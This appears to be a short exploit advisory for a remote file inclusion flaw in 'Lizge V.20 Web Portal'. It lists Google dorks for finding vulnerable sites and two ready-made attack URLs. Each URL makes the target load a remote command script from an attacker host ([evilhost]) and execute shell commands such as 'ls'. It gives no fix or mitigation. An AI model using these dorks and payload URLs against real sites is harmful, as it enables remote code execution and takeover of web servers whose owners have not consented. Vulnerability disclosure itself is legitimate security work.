!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

------------------------------------------------------------------------
--------

Title : Lizge V.20 Web Portal File Include Vulnerability

------------------------------------------------------------------------
--------

#Author: Crackers_Child

#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]

------------------------------------------------------------------------
--------

Affected software description :

------------------------------------------------------------------------
--------

Application : Lizge V.20 Web Portal

URL : http://www.lizge.com

------------------------------------------------------------------------
--------

dork :allinurl:"index.php?lizge=

:allinurl:"index.php?bade=

------------------------------------------------------------------------
--------

Usage:

http://[target]/[lizge_path]//index.php?lizge=http://[evilhost]/cmd.txt?
&cmd=ls

http://[target]/[lizges_path]//index.php?bade=http://[evilhost]/cmd.txt?
&cmd=ls

------------------------------------------------------------------------
--------

greets:

X_ALPEREN_X,Root_MOr And All Other Friends

------------------------------------------------------------------------
--------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------

[ reply ]